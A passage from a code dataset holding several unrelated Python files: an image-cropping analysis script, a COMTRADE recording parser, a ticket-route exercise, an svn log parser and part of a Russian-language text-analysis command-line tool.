min_difference)\n return np.logical_and(blue_mask,\n np.logical_and(red_diff_mask, green_diff_mask))\n\n\n@transformation\ndef convex_hull(image):\n return Region(image).convex_hull\n\n\ndef analyse_file(fpath, output_directory):\n \"\"\"Analyse a single file.\"\"\"\n logging.info(\"Analysing file: {}\".format(fpath))\n image = Image.from_file(fpath)\n image = rescale(image, 0.5)\n image = rotate(image)\n mask = blue_to_mask(image, 150, 60)\n mask = remove_small_objects(mask, min_size=10)\n if np.sum(mask) < 10:\n print(\"skipping {}\".format(fpath))\n return\n mask = convex_hull(mask)\n ys, xs = Region(mask).index_arrays\n\n fname = generate_output_filename(fpath)\n fpath = os.path.join(AutoName.directory, fname)\n with open(fpath, \"wb\") as fh:\n fh.write(image[min(ys):max(ys), min(xs):max(xs), :].png())\n\n\ndef analyse_directory(input_directory, output_directory):\n \"\"\"Analyse all the files in a directory.\"\"\"\n logging.info(\"Analysing files in directory: {}\".format(input_directory))\n for fname in os.listdir(input_directory):\n fpath = os.path.join(input_directory, fname)\n analyse_file(fpath, output_directory)\n\n\ndef main():\n # Parse the command line arguments.\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument(\"input_source\", help=\"Input file/directory\")\n parser.add_argument(\"output_dir\", help=\"Output directory\")\n parser.add_argument(\"--debug\", default=False, action=\"store_true\",\n help=\"Write out intermediate images\")\n args = parser.parse_args()\n\n # Create the output directory if it does not exist.\n if not os.path.isdir(args.output_dir):\n os.mkdir(args.output_dir)\n AutoName.directory = args.output_dir\n\n # Only write out intermediate images in debug mode.\n if not args.debug:\n AutoWrite.on = False\n\n # Setup a logger for the script.\n log_fname = \"audit.log\"\n log_fpath = os.path.join(args.output_dir, log_fname)\n logging_level = logging.INFO\n if args.debug:\n logging_level = logging.DEBUG\n logging.basicConfig(filename=log_fpath, level=logging_level)\n\n # Log some basic information about the script that is running.\n logging.info(\"Script name: {}\".format(__file__))\n logging.info(\"Script version: {}\".format(__version__))\n\n # Run the analysis.\n if os.path.isfile(args.input_source):\n analyse_file(args.input_source, args.output_dir)\n elif os.path.isdir(args.input_source):\n analyse_directory(args.input_source, args.output_dir)\n else:\n parser.error(\"{} not a file or directory\".format(args.input_source))\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scripts/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":4665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"243970929","text":"# -*- coding: utf-8 -*-\n\nimport datetime as dt\nimport errno\nimport math\nimport os\nimport re\nimport struct\nimport sys\nimport warnings\n\n# COMTRADE standard revisions\nREV_1991 = \"1991\"\nREV_1999 = \"1999\"\nREV_2013 = \"2013\"\n\n# DAT file format types\nTYPE_ASCII = \"ASCII\"\nTYPE_BINARY = \"BINARY\"\nTYPE_BINARY32 = \"BINARY32\"\nTYPE_FLOAT32 = \"FLOAT32\"\n\n# Special values\nTIMESTAMP_MISSING = 0xFFFFFFFF\n\n# CFF headers\nCFF_HEADER_REXP = \"(?i)--- file type: ([a-z]+)(?:\\\\s([a-z]+))? ---$\"\n\n# common separator character of data fields of CFG and ASCII DAT files\nSEPARATOR = \",\"\n\n# timestamp regular expression\nre_dt = re.compile(\"([0-9]{1,2})/([0-9]{1,2})/([0-9]{4}),([0-9]{2}):([0-9]{2}):([0-9]{2})\\\\.([0-9]{5,12})\")\n\n# Non-standard revision warning\nWARNING_UNKNOWN_REVISION = \"Unknown standard revision \\\"{}\\\"\"\n# Date time with nanoseconds resolution warning\nWARNING_DATETIME_NANO = \"Unsupported datetime objects with nanoseconds \\\nresolution. Using truncated values.\"\n\n\ndef _read_sep_values(line):\n return line.strip().split(SEPARATOR)\n\n\ndef _prevent_null(str_value, type, default_value):\n if len(str_value.strip()) == 0:\n return default_value\n else:\n return type(str_value)\n\n\ndef _read_timestamp(tstamp):\n m = re_dt.match(tstamp)\n day = int(m.group(1))\n month = int(m.group(2))\n year = int(m.group(3))\n hour = int(m.group(4))\n minute = int(m.group(5))\n second = int(m.group(6))\n frac_second = int(m.group(7))\n in_nanoseconds = len(m.group(7)) > 6\n\n # timezone information\n tzinfo = None\n microsecond = frac_second\n if in_nanoseconds:\n # Nanoseconds resolution is not supported by datetime module, so it's\n # converted to integer below.\n warnings.warn(Warning(WARNING_DATETIME_NANO))\n microsecond = int(microsecond * 1E-3)\n\n return dt.datetime(year, month, day, hour, minute, second, \n microsecond, tzinfo)\n\n\nclass Cfg:\n # time base units\n TIME_BASE_NANOSEC = 1E-9\n TIME_BASE_MICROSEC = 1E-6\n\n def __init__(self):\n self.filename = \"\"\n # implicit data\n self._time_base = self.TIME_BASE_MICROSEC\n\n # Default CFG data\n self._station_name = \"\"\n self._rec_dev_id = \"\"\n self._rev_year = 2013\n self._channels_count = 0\n self._analog_channels = []\n self._digital_channels = []\n self._analog_count = 0\n self._digital_count = 0\n self._frequency = 60.0\n self._nrates = 1\n self._sample_rates = []\n self._timestamp_critical = False\n self._start_timestamp = \"\"\n self._trigger_timestamp = \"\"\n self._ft = TYPE_ASCII\n self._timemult = 1.0\n # 2013 standard revision information\n # time_code,local_code = 0,0 means local time is UTC\n self._time_code = 0\n self._local_code = 0\n # tmq_code,leapsec\n self._tmq_code = 0\n self._leapsec = 0\n\n @property\n def station_name(self):\n return self._station_name\n \n @property\n def rec_dev_id(self):\n return self._rec_dev_id\n\n @property\n def rev_year(self):\n return self._rev_year\n\n @property\n def channels_count(self):\n return self._channels_count\n\n @property\n def analog_channels(self):\n return self._analog_channels\n \n @property\n def digital_channels(self):\n return self._digital_channels\n \n @property\n def analog_count(self):\n return self._analog_count\n \n @property\n def digital_count(self):\n return self._digital_count\n \n @property\n def time_base(self):\n return self._time_base\n\n @property\n def frequency(self):\n return self._frequency\n \n @property\n def ft(self):\n return self._ft\n \n @property\n def timemult(self):\n return self._timemult\n \n @property\n def start_timestamp(self):\n return self._start_timestamp\n \n @property\n def trigger_timestamp(self):\n return self._trigger_timestamp\n \n @property\n def nrates(self):\n return self._nrates\n \n @property\n def sample_rates(self):\n return self._sample_rates\n\n def load(self, filepath):\n self.filepath = filepath\n\n if os.path.isfile(self.filepath):\n with open(self.filepath, \"r\") as cfg:\n self._read_file(cfg)\n else:\n raise FileNotFoundError(errno.ENOENT, os.strerror(errno.ENOENT), \n self.filepath)\n\n def read(self, cfg_lines):\n if type(cfg_lines) is str:\n self._read_file(cfg_lines.splitlines())\n else:\n self._read_file(cfg_lines)\n\n def _read_file(self, cfg):\n line_count = 0\n self._nrates = 1\n self._sample_rates = []\n self._analog_channels = []\n self._digital_channels = []\n for line in cfg:\n if 0 == line_count:\n # station, device, and comtrade standard revision information\n packed = _read_sep_values(line)\n if 3 == len(packed):\n # only 1999 revision and above has the standard revision year\n self._station_name, self._rec_dev_id, self._rev_year = packed\n self._rev_year = self._rev_year.strip()\n\n if self._rev_year not in (REV_1991, REV_1999, REV_2013):\n msg = WARNING_UNKNOWN_REVISION.format(self._rev_year)\n warnings.warn(Warning(msg))\n else:\n self._station_name, self._rec_dev_id = packed\n self._rev_year = REV_1999\n\n if 1 == line_count:\n # number of channels and its type\n totchn, achn, dchn = _read_sep_values(line)\n self._channels_count = int(totchn)\n self._analog_count = int(achn[:-1])\n self._digital_count = int(dchn[:-1])\n self._analog_channels = [None]*self._analog_count\n self._digital_channels = [None]*self._digital_count\n if 1 < line_count and line_count <= 1 + self._channels_count:\n # channel information\n # channel index\n ichn = line_count - 2\n packed = _read_sep_values(line)\n # analog or digital channel?\n if ichn < self._analog_count:\n # analog channel index\n iachn = ichn\n # unpack values\n n, name, ph, ccbm, uu, a, b, skew, cmin, cmax, primary, secondary, pors = packed\n # type conversion\n n = int(n)\n a = float(a)\n b = _prevent_null(b, float, 0.0)\n skew = _prevent_null(skew, float, 0.0)\n cmin = float(cmin)\n cmax = float(cmax)\n primary = float(primary)\n secondary = float(secondary)\n self.analog_channels[iachn] = AnalogChannel(n, a, b, skew, \n cmin, cmax, name, uu, ph, ccbm, primary, secondary, pors)\n else:\n # digital channel index\n idchn = ichn - self._analog_count\n # unpack values\n n, name, ph, ccbm, y = packed\n # type conversion\n n = int(n)\n y = int(y)\n self.digital_channels[idchn] = DigitalChannel(n, name, ph, ccbm, y)\n\n if line_count == 2 + self._channels_count:\n self._frequency = float(line.strip())\n if line_count == 3 + self._channels_count:\n # number of different sample rates\n self._nrates = int(line.strip())\n if self._nrates == 0:\n self._nrates = 1\n self._timestamp_critical = True\n else:\n self._timestamp_critical = False\n if line_count > 3 + self._channels_count and line_count <= 3 + self._channels_count + self._nrates:\n # each sample rate\n samp, endsamp = _read_sep_values(line)\n samp = float(samp)\n endsamp = int(endsamp)\n self.sample_rates.append([samp, endsamp])\n\n if line_count == 4 + self._channels_count + self._nrates:\n # first data point and time base\n ts_str = line.strip()\n self._start_timestamp = _read_timestamp(ts_str)\n self._time_base = self._get_time_base(ts_str)\n\n if line_count == 5 + self._channels_count + self._nrates:\n # event data point and time base\n ts_str = line.strip()\n self._trigger_timestamp = _read_timestamp(ts_str)\n\n self._time_base = min([self.time_base, \n self._get_time_base(ts_str)])\n\n if line_count == 6 + self._channels_count + self._nrates:\n # file type\n self._ft = line.strip()\n\n if self._rev_year in (REV_1999, REV_2013):\n if line_count == 7 + self._channels_count + self._nrates:\n # timestamp multiplication factor\n self._timemult = float(line.strip())\n\n if self._rev_year == REV_2013:\n if line_count == (8 + self._channels_count + self._nrates):\n # time_code and local_code\n self._time_code, self._local_code = _read_sep_values(line)\n if line_count == (9 + self._channels_count + self._nrates):\n # time_code and local_code\n self._tmq_code, self._leapsec = _read_sep_values(line)\n\n line_count = line_count + 1\n\n def _get_time_base(self, timestamp):\n # Return the time base based on the fractionary part of the seconds\n # in a timestamp (00.XXXXX).\n match = re_dt.match(timestamp)\n in_nanoseconds = len(match.group(7)) > 6\n if in_nanoseconds:\n return self.TIME_BASE_NANOSEC\n else:\n return self.TIME_BASE_MICROSEC\n\n\n\nclass Comtrade:\n # extensions\n EXT_CFG = \"cfg\"\n EXT_DAT = \"dat\"\n # format specific\n ASCII_SEPARATOR = \",\"\n \n def __init__(self):\n self.filename = \"\"\n\n self._cfg = Cfg()\n\n # Default CFG data\n self._analog_channel_ids = []\n self._digital_channel_ids = []\n self._timestamp_critical = False\n\n # DAT file data\n self._time_values = []\n self._analog_values = []\n self._digital_values = []\n\n @property\n def station_name(self):\n return self._cfg._station_name\n \n @property\n def rec_dev_id(self):\n return self._cfg._rec_dev_id\n\n @property\n def rev_year(self):\n return self._cfg._rev_year\n\n @property\n def cfg(self):\n return self._cfg\n\n @property\n def analog_channel_ids(self):\n return self._analog_channel_ids\n \n @property\n def digital_channel_ids(self):\n return self._digital_channel_ids\n\n @property\n def time(self):\n return self._time_values\n\n @property\n def analog(self):\n return self._analog_values\n \n @property\n def digital(self):\n return self._digital_values\n\n @property\n def total_samples(self):\n return self._total_samples\n\n @property\n def frequency(self):\n return self._cfg.frequency\n\n @property\n def start_timestamp(self):\n return self._cfg.start_timestamp\n\n @property\n def trigger_timestamp(self):\n return self._cfg.trigger_timestamp\n\n @property\n def channels_count(self):\n return self._cfg.channels_count\n\n @property\n def analog_count(self):\n return self._cfg.analog_count\n \n @property\n def digital_count(self):\n return self._cfg.digital_count\n\n @property\n def trigger_time(self):\n \"\"\"Relative trigger time in seconds.\"\"\"\n stt = self._cfg.start_timestamp\n trg = self._cfg.trigger_timestamp\n tdiff = trg - stt\n tsec = (tdiff.days*60*60*24) + tdiff.seconds + (tdiff.microseconds*1E-6)\n return tsec\n\n @property\n def time_base(self):\n return self._cfg.time_base\n\n @property\n def ft(self):\n return self._cfg.ft\n \n def __str__(self):\n pass\n\n def __repr__(self):\n pass\n\n def _get_dat_reader(self):\n # case insensitive comparison of file format\n dat = None\n ft_upper = self.ft.upper()\n if ft_upper == TYPE_ASCII:\n dat = AsciiDatReader()\n elif ft_upper == TYPE_BINARY:\n dat = BinaryDatReader()\n elif ft_upper == TYPE_BINARY32:\n dat = Binary32DatReader()\n elif ft_upper == TYPE_FLOAT32:\n dat = Float32DatReader()\n else:\n dat = None\n raise Exception(\"Not supported data file format: {}\".format(self.ft))\n return dat\n\n def read(self, cfg_lines, dat_lines):\n self._cfg.read(cfg_lines)\n\n # channel ids\n self._cfg_extract_channels_ids(self._cfg)\n\n dat = self._get_dat_reader()\n dat.read(dat_lines, self._cfg)\n\n # copy dat object information\n self._dat_extract_data(dat)\n\n def _cfg_extract_channels_ids(self, cfg):\n self._analog_channel_ids = [channel.name for channel in cfg.analog_channels]\n self._digital_channel_ids = [channel.name for channel in cfg.digital_channels]\n\n def _dat_extract_data(self, dat):\n self._time_values = dat.time\n self._analog_values = dat.analog\n self._digital_values = dat.digital\n self._total_samples = dat.total_samples\n\n def load(self, cfg_file, dat_file = None):\n # which extension: CFG or CFF?\n file_ext = cfg_file[-3:].upper()\n if file_ext == \"CFG\":\n # if not informed, infer dat_file with cfg_file\n if dat_file is None:\n dat_file = cfg_file[:-3] + \"DAT\"\n\n # load both\n self._load_cfg_dat(cfg_file, dat_file)\n elif file_ext == \"CFF\":\n # check if the CFF file exists\n # load file\n self._load_cff(cfg_file)\n else:\n # TODO: raise exception: expected CFG file\n pass\n\n def _load_cfg_dat(self, cfg_filepath, dat_filepath):\n self._cfg.load(cfg_filepath)\n\n # channel ids\n self._cfg_extract_channels_ids(self._cfg)\n\n dat = self._get_dat_reader()\n dat.load(dat_filepath, self._cfg)\n\n # copy dat object information\n self._dat_extract_data(dat)\n\n def _load_cff(self, cff_filepath):\n # stores each file type lines\n cfg_lines = []\n dat_lines = []\n hdr_lines = []\n inf_lines = []\n with open(cff_filepath, \"r\") as file:\n line_number = 0\n # file type: CFG, HDR, INF, DAT\n ftype = None\n # file format: ASCII, BINARY, BINARY32, FLOAT32\n fformat = None\n header_re = re.compile(CFF_HEADER_REXP)\n last_match = None\n for line in file:\n mobj = header_re.match(line.strip().upper())\n if mobj is not None:\n last_match = mobj\n ftype = last_match.groups()[0]\n fformat = last_match.groups()[1]\n continue\n if last_match is not None and ftype == \"CFG\":\n cfg_lines.append(line.strip())\n\n if last_match is not None and ftype == \"DAT\":\n dat_lines.append(line.strip())\n\n if last_match is not None and ftype == \"HDR\":\n hdr_lines.append(line.strip())\n\n if last_match is not None and ftype == \"INF\":\n inf_lines.append(line.strip())\n \n # process CFF data\n self.read(cfg_lines, dat_lines)\n\n\n def cfg_summary(self):\n st = \"Channels (total,A,D): {}A + {}D = {}\\n\".format(self.analog_count, self.digital_count, self.channels_count)\n st = st + \"Line frequency: {} Hz\\n\".format(self.frequency)\n for i in range(self._cfg.nrates):\n rate, points = self._cfg.sample_rates[i]\n st = st + \"Sample rate of {} Hz to the sample #{}\\n\".format(rate, points)\n st = st + \"From {} to {} with time mult. = {}\\n\".format(self.start_timestamp, self.trigger_timestamp, self._cfg.timemult)\n st = st + \"{} format\\n\".format(self.ft)\n return st\n\n\nclass Channel:\n def __init__(self, n=1, name='', ph='', ccbm=''):\n self.n = n\n self.name = name\n self.ph = ph\n self.ccbm = ccbm\n\n def __str__(self):\n return ','.join([str(self.n), self.name, self.ph, self.ccbm])\n\n\nclass DigitalChannel(Channel):\n def __init__(self, n, name='', ph='', ccbm='', y=''):\n self.name = name\n self.n = n\n self.name = name\n self.ph = ph\n self.ccbm = ccbm\n self.y = y\n\n def __str__(self):\n fields = [str(self.n), self.name, self.ph, self.ccbm, str(self.y)]\n\n\nclass AnalogChannel(Channel):\n def __init__(self, n, a, b=0.0, skew=0.0, cmin=-32767, cmax=32767, \n name='', uu='', ph='', ccbm='', primary=1, secondary=1, pors='P'):\n self.name = name\n self.uu = uu\n self.n = n\n self.a = a\n self.b = b\n self.skew = skew\n self.cmin = cmin\n self.cmax = cmax\n # misc\n self.uu = uu\n self.ph = ph\n self.ccbm = ccbm\n self.primary = primary\n self.secondary = secondary\n self.pors = pors\n\n def __str__(self):\n fields = [str(self.n), self.name, self.ph, self.ccbm, self.uu, \n str(self.a), str(self.b), str(self.skew), str(self.cmin), \n str(self.cmax), str(self.primary), str(self.secondary), self.ps]\n return ','.join(fields)\n\n\nclass DatReader:\n read_mode = \"r\"\n\n def __init__(self):\n self.filepath = \"\"\n self._content = None\n self._cfg = None\n self.time = []\n self.analog = []\n self.digital = []\n self._total_samples = 0\n\n @property\n def total_samples(self):\n return self._total_samples\n\n def load(self, dat_filepath, cfg):\n self.filepath = dat_filepath\n self._content = None\n if os.path.isfile(self.filepath):\n # extract CFG file information regarding data dimensions\n self._cfg = cfg\n self._preallocate()\n with open(self.filepath, self.read_mode) as contents:\n self.parse(contents)\n else:\n raise FileNotFoundError(errno.ENOENT, os.strerror(errno.ENOENT), \n self.filepath)\n\n def read(self, dat_lines, cfg):\n self.filepath = None\n self._content = dat_lines\n self._cfg = cfg\n self._preallocate()\n self.parse(dat_lines)\n\n def _preallocate(self):\n # read from the cfg file the number of samples in the dat file\n steps = self._cfg.sample_rates[-1][1] # last samp field\n self._total_samples = steps\n\n # analog and digital count\n analog_count = self._cfg.analog_count\n digital_count = self._cfg.digital_count\n\n # preallocate analog and digital values\n self.time = [0.0] * steps\n self.analog = [None] * analog_count\n self.digital = [None] * digital_count\n # preallocate each channel values with zeros\n for i in range(analog_count):\n self.analog[i] = [0.0] * steps\n for i in range(digital_count):\n self.digital[i] = [0] * steps\n\n def parse(self, contents):\n pass\n\n\nclass AsciiDatReader(DatReader):\n ASCII_SEPARATOR = SEPARATOR\n\n DATA_MISSING = \"\"\n\n def parse(self, contents):\n analog_count = self._cfg.analog_count\n digital_count = self._cfg.digital_count\n timemult = self._cfg.timemult\n time_base = self._cfg.time_base\n\n # auxillary vectors (channels gains and offsets)\n a = [x.a for x in self._cfg.analog_channels]\n b = [x.b for x in self._cfg.analog_channels]\n\n # extract lines\n if type(contents) is str:\n lines = contents.splitlines()\n else:\n lines = contents\n\n line_number = 0\n for line in lines:\n line_number = line_number + 1\n if line_number <= self._total_samples:\n values = line.strip().split(self.ASCII_SEPARATOR)\n\n n = values[0]\n t = float(values[1]) * time_base * timemult\n avalues = [float(x)*a[i] + b[i] for i, x in enumerate(values[2:analog_count+2])]\n dvalues = [int(x) for x in values[analog_count+2:]]\n\n # store\n self.time[line_number-1] = t\n for i in range(analog_count):\n self.analog[i][line_number - 1] = avalues[i]\n for i in range(digital_count):\n self.digital[i][line_number - 1] = dvalues[i]\n\n\nclass BinaryDatReader(DatReader):\n ANALOG_BYTES = 2\n DIGITAL_BYTES = 2\n TIME_BYTES = 4\n SAMPLE_NUMBER_BYTES = 4\n\n # maximum negative value\n DATA_MISSING = 0xFFFF\n\n read_mode = \"rb\"\n\n STRUCT_FORMAT = \"LL {acount:d}h {dcount:d}H\"\n STRUCT_FORMAT_ANALOG_ONLY = \"LL {acount:d}h\"\n STRUCT_FORMAT_DIGITAL_ONLY = \"LL {dcount:d}H\"\n\n def get_reader_format(self, analog_channels, digital_bytes):\n # Number of digital fields of 2 bytes based on the total number of \n # bytes.\n dcount = math.floor(digital_bytes / 2)\n \n # Check the file configuration\n if int(digital_bytes) > 0 and int(analog_channels) > 0:\n return self.STRUCT_FORMAT.format(acount=analog_channels, \n dcount=dcount)\n elif int(analog_channels) > 0:\n # Analog channels only.\n return self.STRUCT_FORMAT_ANALOG_ONLY.format(acount=analog_channels)\n else:\n # Digital channels only.\n return self.STRUCT_FORMAT_DIGITAL_ONLY.format(acount=dcount)\n\n def parse(self, contents):\n timemult = self._cfg.timemult\n time_base = self._cfg.time_base\n frequency = self._cfg.frequency\n achannels = self._cfg.analog_count\n dchannels = self._cfg.digital_count\n\n # auxillary vectors (channels gains and offsets)\n a = [x.a for x in self._cfg.analog_channels]\n b = [x.b for x in self._cfg.analog_channels]\n\n sample_id_bytes = self.SAMPLE_NUMBER_BYTES + self.TIME_BYTES\n abytes = achannels*self.ANALOG_BYTES\n dbytes = self.DIGITAL_BYTES * math.ceil(dchannels / 16.0)\n bytes_per_row = sample_id_bytes + abytes + dbytes\n groups_of_16bits = math.floor(dbytes / self.DIGITAL_BYTES)\n period = 1 / frequency\n\n # Struct format.\n rowreader = struct.Struct(self.get_reader_format(achannels, dbytes))\n\n # Row reading function.\n nextrow = None\n if hasattr(contents, 'read'):\n # It's an IO buffer.\n nextrow = lambda offset: contents.read(bytes_per_row)\n else:\n # It's an array.\n nextrow = lambda offset: contents[offset:offset + bytes_per_row]\n\n # Get next row.\n buffer_offset = 0\n row = nextrow(buffer_offset)\n\n irow = 0\n while row != b'':\n values = rowreader.unpack(row)\n # Sample number\n n = values[0]\n # Calculated time\n # TODO: add support for multiple sampling rates\n t = (n - 1) * period\n\n # Read time\n ts_val = values[1]\n if ts_val != TIMESTAMP_MISSING:\n ts = values[1] * time_base * timemult\n else:\n # if the timestamp is missing, use calculated.\n ts = t\n\n # Using calculated timestamp, ignoring file timestamp.\n # TODO: add option to enforce dat file timestamp, when available\n self.time[irow] = t\n\n # Extract analog channel values.\n for ichannel in range(achannels):\n yint = values[ichannel + 2]\n y = a[ichannel] * yint + b[ichannel]\n self.analog[ichannel][irow] = y\n\n # Extract digital channel values.\n for igroup in range(groups_of_16bits):\n group = values[achannels + 2 + igroup]\n\n # for each group of 16 bits, extract the digital channels\n maxchn = min([ (igroup+1) * 16, dchannels])\n for ichannel in range(igroup * 16, maxchn):\n chnindex = ichannel - igroup*16\n mask = int('0b01', 2) << chnindex\n extract = (group & mask) >> chnindex\n\n self.digital[ichannel][irow] = extract\n\n # Get the next row\n irow += 1\n buffer_offset += bytes_per_row\n row = nextrow(buffer_offset)\n\n\nclass Binary32DatReader(BinaryDatReader):\n ANALOG_BYTES = 4\n\n STRUCT_FORMAT = \"LL {acount:d}l {dcount:d}H\"\n STRUCT_FORMAT_ANALOG_ONLY = \"LL {acount:d}l\"\n\n # maximum negative value\n DATA_MISSING = 0xFFFFFFFF\n\n\nclass Float32DatReader(BinaryDatReader):\n ANALOG_BYTES = 4\n\n STRUCT_FORMAT = \"LL {acount:d}f {dcount:d}H\"\n STRUCT_FORMAT_ANALOG_ONLY = \"LL {acount:d}f\"\n\n # Maximum negative value\n DATA_MISSING = sys.float_info.min\n","sub_path":"comtrade.py","file_name":"comtrade.py","file_ext":"py","file_size_in_byte":25541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"56849119","text":"# Hint: You may not need all of these. Remove the unused functions.\nclass Ticket:\n def __init__(self, source, destination):\n self.source = source\n self.destination = destination\n\n\ndef reconstruct_trip(tickets, length):\n \"\"\"\n YOUR CODE HERE\n \"\"\"\n # Your code here\n\n # Build up a table of sources to destinations\n table = {}\n for ticket in tickets:\n if ticket.source == \"NONE\":\n table[\"START\"] = ticket.destination\n elif ticket.destination == \"NONE\":\n table[ticket.source] = \"END\"\n else:\n table[ticket.source] = ticket.destination\n\n # Create a list with a length equaling all destinations\n route = [None] * (length)\n\n # Create pointers for our while loop\n current = \"START\"\n destination = table[current]\n index = 0\n\n while destination in table:\n route[index] = destination\n index += 1\n current = destination\n destination = table[current]\n route[index] = \"NONE\"\n return route\n","sub_path":"hashtables/ex2/ex2.py","file_name":"ex2.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"328704064","text":"# open the file - and read all of the lines.\r\nchanges_file = 'changes_python.txt'\r\n# use strip to strip out spaces and trim the line.\r\n\r\ndata = [line.strip() for line in open(changes_file, 'r')]\r\n\r\nsep = 72*'-'\r\n\r\n# create the commit class to hold each of the elements - there should be 422\r\nclass Commit:\r\n 'class for commits'\r\n \r\n def __init__(self, revision = None, author = None, date = None, comment_line_count = None, changes = None, comment = None):\r\n self.revision = revision\r\n self.author = author\r\n self.date = date\r\n self.comment_line_count = comment_line_count\r\n self.changes = changes\r\n self.comment = comment\r\n\r\n def get_commit_comment(self):\r\n return 'svn merge -r' + str(self.revision-1) + ':' + str(self.revision) + ' by ' \\\r\n + self.author + ' with the comment ' + ','.join(self.comment) \\\r\n + ' and the changes ' + ','.join(self.changes)\r\n\r\ncommits = []\r\ncurrent_commit = None\r\nindex = 0\r\n\r\nauthor = {}\r\nwhile True:\r\n try:\r\n # parse each of the commits and put them into a list of commits\r\n current_commit = Commit()\r\n details = data[index + 1].split('|')\r\n current_commit.revision = int(details[0].strip().strip('r'))\r\n current_commit.author = details[1].strip()\r\n current_commit.date = details[2].strip()\r\n current_commit.comment_line_count = int(details[3].strip().split(' ')[0])\r\n current_commit.changes = data[index+2:data.index('',index+1)]\r\n #print(current_commit.changes)\r\n index = data.index(sep, index + 1)\r\n current_commit.comment = data[index-current_commit.comment_line_count:index]\r\n commits.append(current_commit)\r\n except IndexError:\r\n break\r\n\r\n#print(len(commits))\r\n\r\n\r\n#commits.reverse()\r\n\r\n#for index, commit in enumerate(commits):\r\n # print(commit.get_commit_comment()\r\n\r\n\r\ndef read_file(changes_file):\r\n # use strip to strip out spaces and trim the line.\r\n data = [line.strip() for line in open(changes_file, 'r')]\r\n return data\r\n\r\ndef get_commits(data):\r\n sep = 72*'-'\r\n commits = []\r\n current_commit = None\r\n index = 0\r\n while index < len(data):\r\n try:\r\n # parsing each of the commits and putting them into a list of commits\r\n details = data[index + 1].split('|')\r\n # with spaces at end removed.\r\n commit = {'revision': details[0].strip(),\r\n 'author': details[1].strip(),\r\n 'date': details[2].strip(),\r\n 'number_of_lines': details[3].strip().split(' ')[1]\r\n }\r\n # add details to the list of commits.\r\n commits.append(commit)\r\n index = data.index(sep, index + 1)\r\n except IndexError:\r\n break\r\n return commits\r\n\t\r\ndef get_authors(data):\r\n sep = 72*'-'\r\n authors = []\r\n current_commit = None\r\n index = 0\r\n while index < len(data):\r\n try:\r\n # parse each of the authors and put them into a list of authors\r\n author = data[index + 1].split('|')[1].strip()\r\n if author in authors:\r\n authors[author] = authors[author] + 1\r\n else: \r\n authors[author] = 1\r\n index = data.index(sep, index + 1)\r\n except IndexError:\r\n break\r\n return authors\r\n\t\r\ndef get_date(data):\r\n sep = 72*'-'\r\n dates = []\r\n current_commit = None\r\n index = 0\r\n while index < len(data):\r\n try:\r\n # parse each of the authors and put them into a list of authors\r\n date = data[index + 1].split('|')[2].strip()\r\n dates.append(date)\r\n index = data.index(sep, index + 1) \r\n except IndexError:\r\n break\r\n return dates \r\n\r\n \r\nif __name__ == '__main__':\r\n # open the file - and read all of the lines.\r\n changes_file = 'changes_python.txt'\r\n data = read_file(changes_file)\r\n commits = get_commits(data)\r\n\r\n # print the number of lines read\r\n #print(len(data))\r\n #print(commits)\r\n #print(commits[0])\r\n print(commits[1]['author'])\r\n print(commits[2]['author'])\r\n print(commits[3]['author'])\r\n print(len(commits[0]['author']))\r\n \r\n\r\n \r\n #print(len(commits))\r\n #print(len(commits[0]['author']))\r\n #print(len(commits[0]['date']))\r\n # print get_date(data)\r\n #print len(get_date(data))\r\n","sub_path":"simple.py","file_name":"simple.py","file_ext":"py","file_size_in_byte":4425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"259718387","text":"import re\n\nimport functions\n\n\ndef inputs(path_to='файлу'):\n way_to_file = str(\n input('Пожалуйста введите путь к ' + path_to + ' : ')).lower()\n propertys = str(input('Please write propertys: ')).lower().split()\n return(way_to_file, propertys)\n\n\ndef help_me():\n help_text = \"\"\"Если вы используете это впервые, введите $download\nФункции:\n $help - помощь\n $download - установить компоненты nltk\n $analysis m - проанализировать 1 файл\n $analysis p - проанализировать 1 файл по частям\n $analysis f - проанализировать все файлы в папке\n $analysis pf - проанализировать все файлы в папке по частям\nВас могут попросить ввести дополнительную информацию, например путь к файлу, или выбрать модификаторы.\nСвойства:\n '-f' - сохранить в файл (analysis m или analysis f)\n '-s - изменить коичество предожений в блоке (analysis p или analysis pf)\nАнализируемые свойства (analysis p или analysis pf):\n '-ld' - lexical divercity (лексическое разнообразие)\n '-mw' - mean word len (средня длинна слова)\n '-ms' - mean sentence len (средняя длинна предложения)\n '-cs' - commas per symbols (количество запятых на 1000 символов)\n\"\"\"\n print(help_text)\n pass\n\n\ndef analysis_propertys(propertys, kwargs):\n if '-f' in propertys and 'in_file' in kwargs.keys():\n kwargs['in_file'] = True\n if '-n' in propertys and 'new' in kwargs.keys():\n kwargs['new'] = True\n if 'file_name' in kwargs.keys():\n file_name = str(input('Please write file name: '))\n if '.' not in file_name:\n file_name = file_name + '.csv'\n kwargs['file_name'] = file_name\n if '-s' in propertys and 'sentences_in_block' in kwargs.keys():\n kwargs['sentences_in_block'] = int(input(\n 'Please write number of sentences in block: '))\n if '-c' in propertys and 'check_author' in kwargs.keys() and 'author' in kwargs.keys():\n kwargs['check_author'] = True\n kwargs['author'][0] = str(input('Please write author name: '))\n kwargs['author'][1] = str(input('Please write author surname: '))\n\n\ndef return_analysis_view():\n way_to_file, propertys = inputs()\n kwargs = {'in_file': False,\n 'file_name': 'default.csv',\n 'new': True}\n analysis_propertys(propertys, kwargs)\n print('Please wait...')\n functions.return_analysis(way_to_file, **kwargs)\n\n\ndef return_analysis_parts_view():\n way_to_file, propertys = inputs()\n kwargs = {'sentences_in_block': 150}\n analysis_propertys(propertys, kwargs)\n print('Наберитесь терпения...')\n functions.return_analysis_parts(way_to_file, **kwargs)\n\n\ndef return_analysis_folder_view():\n way_to_file, propertys = inputs(path_to='folder')\n kwargs = {'check_author': False,\n 'author': ['name', 'surname'],\n 'in_file': False,\n 'file_name': 'default.csv',\n 'new': True}\n analysis_propertys(propertys, kwargs)\n print('Подождите...')\n functions.return_analysis_folder(way_to_file, **kwargs)\n\n\ndef return_analysis_parts_folder_view():\n way_to_file, propertys = 